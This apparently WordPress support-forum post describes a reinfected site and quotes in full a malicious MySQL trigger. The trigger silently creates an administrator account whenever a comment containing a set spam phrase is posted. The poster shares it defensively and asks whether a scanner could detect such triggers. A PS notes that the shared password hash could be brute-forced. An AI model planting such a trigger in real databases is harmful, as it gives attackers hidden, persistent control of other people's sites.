Re-Hacked via DB-Trigger
-
Hi there,
I just helped a friend with a hacked website. It was round 2, because we had removed the false-admin-account (wp-admin | [email protected] – seems to be a known hacker-account) and deleted/repaired all hacked files.
When the account appeared again I looked deeper into everything.I found a trigger (name: after_insert_comment) in the database with the following code:
BEGIN IF NEW.comment_content LIKE '%are you struggling to get comments on your blog?%' THEN SET @lastInsertWpUsersId = (SELECT MAX(id) FROM database.wp_users); SET @nextWpUsersID = @lastInsertWpUsersId + 1; INSERT INTO database.wp_users (ID, user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_activation_key, user_status, display_name) VALUES (@nextWpUsersID, 'wpadmin', '$1$yUXpYwXN$JhwwoGJxViPhtGdNG5UZs0', 'wpadmin', '[email protected]', 'https://wordpress.com', '2014-06-08 00:00:00', '', '0', 'Kris'); INSERT INTO database.wp_usermeta (umeta_id, user_id, meta_key, meta_value) VALUES (NULL, @nextWpUsersID, 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}'); INSERT INTO database.wp_usermeta (umeta_id, user_id, meta_key, meta_value) VALUES (NULL, @nextWpUsersID, 'wp_user_level', '10'); END IF; END
I found the same trigger in three databases in the same webspace and wonder in how many pages this trigger is waiting.
Is there any way that wordfence could be able to find db-triggers and show them in the scan?PS: the pw-hash was the same in all triggers so bruteforcing it could be pretty interesting since you could get access to a lot of sites (I changed it just a bit ;-))
- The topic ‘Re-Hacked via DB-Trigger’ is closed to new replies.